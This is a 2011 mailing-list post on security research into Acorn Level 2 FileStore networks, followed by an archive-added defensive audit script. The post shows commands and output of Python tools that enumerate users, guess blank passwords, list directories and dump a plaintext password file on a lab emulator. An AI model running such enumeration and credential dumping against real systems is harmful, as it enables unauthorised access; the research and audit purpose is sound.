Date   : Sun, 13 Nov 2011 12:49:02 +0000
From   : Martyn.Ruks@... (Martyn Ruks)
Subject: Security Project - Update 1

I thought I'd give an update on the list as the website for the project won't
be up for a couple of weeks. You will eventually find it under Projects on
the following site:

http://labs.mwrinfosecurity.com

I will send a direct link to the list in a couple of weeks' time.

Thanks to everyone who has responded so far; I hope to enlist help from people
as I progress. I'll put together something that highlights the areas I'm
thinking about looking at, but as a starter for 10 I thought I'd include a
progress update.

I have approached the subject from where my strength lies, in network security,
and so started looking at the login process. I have now written some Python
code that will talk to a Level 2 FileStore using the UDP/IP transport, as
that works well with BeebEm. I have included some output here for those
that are interested (the scripts will be published once the project site
is up). Just so everyone is clear on my motives: any tools and scripts are
produced to help people test and secure their own systems; they can obviously
be used to attack systems, but that is not my or my company's intention.

Searching for valid users on the FileStore. Any other common users observed
on these systems would be welcome additions to my username list.

$ python enum.py -t 192.168.0.254 -p 32768 -f users.txt -v 1
Trying User: SYST
User SYST exists!
Trying User: MANAGER
User MANAGER exists!
Trying User: TEST
User TEST exists!
Trying User: TESTING
No such user as TESTING
Trying User: ADMIN
No such user as ADMIN
Trying User: SYS
No such user as SYS
Trying User: GUEST
No such user as GUEST
Trying User: ROOT
No such user as ROOT
Trying User: MAIL
No such user as MAIL
Trying User: ACORN
No such user as ACORN
Trying User: NETWORK
No such user as NETWORK
Trying User: BBCUSER
No such user as BBCUSER
Trying User: BBC
No such user as BBC
Trying User: USER
No such user as USER
Trying User: USER1
No such user as USER1
Trying User: STATION
No such user as STATION
Trying User: SYSTEM
No such user as SYSTEM
Trying User: GOD
No such user as GOD

Then once we know some users we can check whether they have guessable passwords.
This will be adapted to allow password guessing attacks against a single account.

$ python passwords.py -t 192.168.0.254 -p 32768 -f users.txt -v 1
Trying User: SYST
User SYST does NOT have password BLANK
Trying User: MANAGER
User MANAGER does NOT have password BLANK
Trying User: TEST
User TEST has password BLANK

Then, once you have got access as a user, the CAT tool can get you listings
of directories. It is still crude and needs bug fixing.

$ python catalogue.py -t 192.168.0.254 -p 32768 -u TEST -d "$"
User TEST logged in with password BLANK
$         (ff07)
FILES           
Dir. $           Library LIBRARY   
LIBRARY    DL/    
LIBRARYF   DL/    
PASSWORDS  LWR/R  
SECRET     DL/    

Then you can read files from the system using a crude copy of dump; also
available is a mode to dump the password file in a friendly format. This is
the latter mode.
 
$ python dump.py -t 192.168.0.254 -p 32768 -u TEST -f 1 -d "$.PASSWORDS"
Logged on with user TEST and password BLANK

Username  | Password | Priv
===========================
SYST      | FKJU     | Y
TEST      |          | N
MANAGER   | XFFGAF   | N
BACKDOOR  | PASS     | Y

Hopefully that gives a flavour of what I have done so far; more updates are
expected in the coming weeks. If anybody has BASIC versions of what I have
done in Python, please let me know, as I would love to run these attacks from
an emulator or hardware as well. I will try my hand at some BASIC network
programming later in the project.

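An added example, written for this archive page and not one of Martyn's scripts or MWR's code, that looks at the output above from the defender's side. Given a catalogue listing and a dumped password table in the layout the post shows, it reports which entries the public can read and which accounts have a blank password or the privileged flag set, which is exactly what an administrator of a FileStore would want to check before an outsider does. It assumes the Acorn convention that an access string is "owner/public" with R = read, W = write, L = locked and D = directory, so the letters after the "/" are public rights; that reading is an assumption, as are the two sample inputs, which are constructed to match the post's output.

```python
"""Audit helper for FileStore output of the kind shown in the post.

Added example, not the post's own scripts. It parses (a) a catalogue
listing and (b) a dumped password table and reports the two things a
defender wants to know: which entries the public can read, and which
accounts have a blank password or the privileged flag set.

Assumption: Acorn-style access strings are "owner/public", with R = read,
W = write, L = locked and D = directory; the letters after the "/" are the
public rights. Both sample inputs below are constructed to match the
layout of the catalogue.py and dump.py output in the post.
"""
import re

# Constructed sample: a catalogue listing in the layout the post shows.
SAMPLE_CATALOGUE = """\
User TEST logged in with password BLANK
$         (ff07)
FILES
Dir. $           Library LIBRARY
LIBRARY    DL/
LIBRARYF   DL/
PASSWORDS  LWR/R
SECRET     DL/
"""

# Constructed sample: a password table in the layout the post shows.
SAMPLE_PASSWORD_TABLE = """\
Username | Password | Priv
================================
SYST     | FKJU     | Y
TEST     |          | N
MANAGER  | XFFGAF   | N
BACKDOOR | PASS     | Y
"""

# An access string: zero or more of L/D/W/R, a slash, zero or more of L/D/W/R.
ACCESS_RE = re.compile(r"^[LDWR]*/[LDWR]*$")


def parse_catalogue(text):
    """Return (name, owner_access, public_access) for each catalogue entry.

    Only lines of the form '<NAME> <owner>/<public>' are entries; the login
    line, the '$ (ff07)' header and the 'Dir. $ ... Library ...' line are
    skipped because they do not consist of a name plus an access string.
    """
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or not ACCESS_RE.match(parts[1]):
            continue
        owner, public = parts[1].split("/")
        entries.append((parts[0], owner, public))
    return entries


def public_readable(entries):
    """Names of entries whose public access string grants read ('R')."""
    return [name for name, _owner, public in entries if "R" in public]


def parse_password_table(text):
    """Return a list of {'user', 'password', 'priv'} dicts from a dumped table."""
    rows = []
    for line in text.splitlines():
        # Skip the header row and the '====' separator.
        if "|" not in line or line.lstrip().startswith("Username"):
            continue
        cells = [c.strip() for c in line.split("|")]
        if len(cells) < 3:
            continue
        rows.append({"user": cells[0], "password": cells[1], "priv": cells[2]})
    return rows


def audit_password_table(rows):
    """Flag accounts with an empty password and accounts marked privileged."""
    return {
        "blank_password": [r["user"] for r in rows if r["password"] == ""],
        "privileged": [r["user"] for r in rows if r["priv"].upper() == "Y"],
    }


if __name__ == "__main__":
    cat = parse_catalogue(SAMPLE_CATALOGUE)
    print("Publicly readable entries:", public_readable(cat))
    findings = audit_password_table(parse_password_table(SAMPLE_PASSWORD_TABLE))
    print("Accounts with a blank password:", findings["blank_password"])
    print("Privileged accounts:", findings["privileged"])
```

On the sample data the script reports PASSWORDS as the one publicly readable entry, TEST as the account with a blank password, and SYST and BACKDOOR as the privileged accounts; together those three findings describe the chain in the post, where a blank-password login is enough to read the password file. Run against a real listing, any privileged account that the administrator does not recognise, or any public read on PASSWORDS, is the first thing to fix.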